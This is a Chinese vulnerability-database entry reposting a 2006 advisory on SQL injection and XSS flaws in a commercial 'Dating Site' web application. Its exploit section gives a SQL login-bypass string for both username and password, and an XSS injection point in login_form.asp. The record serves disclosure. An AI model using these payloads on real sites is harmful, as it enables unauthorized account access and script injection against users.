Dating Site [ login bypass & xss]

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053095 漏洞类型
发布时间 2006-11-25 更新时间 2006-11-25
CVE编号 CVE-2006-6022
CVE-2006-6021
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006110101
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
vendor site:http://www.hotwebapp.com/
product:Dating Site
bug:injection sql & xss
risk:high

log in with :
username = ' or '1' = '1
passwd = ' or '1' = '1

xss get :
/login_form.asp?msg=[xss here]

laurent gaffi & benjamin moss
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]